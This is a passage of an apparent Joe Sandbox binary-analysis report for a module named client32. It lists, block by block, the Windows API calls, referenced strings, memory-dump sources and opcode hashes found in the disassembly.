                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                        • String ID: CLTCONN.CPP
                                                                                        • API String ID: 183652615-2872349640
                                                                                        • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                        • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                        • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                        • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: L
                                                                                        • API String ID: 1338273076-2909332022
                                                                                        • Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                        • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                        • Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                        • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,750A94D8,00000010), ref: 111478DB
                                                                                        • wvsprintfA.USER32(00000010,?,?), ref: 111478F2
                                                                                        Strings
                                                                                        • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FormatMessagewvsprintf
                                                                                        • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                        • API String ID: 65494530-3330918973
                                                                                        • Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                        • Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
                                                                                        • Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                        • Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110AD1E3
                                                                                          • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll), ref: 110ACEC4
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEE1
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEEE
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEFC
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF0A
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF18
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF26
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF34
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF42
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF50
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF5E
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF6C
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF7A
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF88
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF96
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFA4
                                                                                          • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFB2
                                                                                        • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                        Strings
                                                                                        • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad_memset
                                                                                        • String ID: winscard.dll is NOT valid!!!
                                                                                        • API String ID: 212038770-1939809930
                                                                                        • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                        • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                        • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                        • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                          • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                          • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                        • String ID: string too long
                                                                                        • API String ID: 963545896-2556327735
                                                                                        • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                        • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                        • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                        • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                        APIs
                                                                                        • GetDlgItemTextA.USER32 ref: 110232D7
                                                                                        • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemText
                                                                                        • String ID: ...
                                                                                        • API String ID: 3367045223-440645147
                                                                                        • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                        • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                        • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                        • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                        APIs
                                                                                        • ShowWindow.USER32(8D111949,00000009), ref: 110B977B
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C,?,?,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?), ref: 110B8AF2
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8AF9
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B00
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B07
                                                                                          • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B24
                                                                                          • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                                        • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                                        Strings
                                                                                        • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                        • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                        • API String ID: 2940908497-693965840
                                                                                        • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                        • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                        • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                        • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                        APIs
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                        • String ID: :
                                                                                        • API String ID: 2034136378-336475711
                                                                                        • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                        • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                        • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                        • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                        APIs
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                        • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClassNameProcessThreadWindow
                                                                                        • String ID: tooltips_class32
                                                                                        • API String ID: 2910564809-1918224756
                                                                                        • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                        • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                        • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                        • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                        APIs
                                                                                          • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                          • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                          • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                          • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                          • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                          • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32 ref: 110CBA0C
                                                                                          • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                        • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                        • _memset.LIBCMT ref: 11039216
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                        • String ID: 506013
                                                                                        • API String ID: 3037201586-3438455666
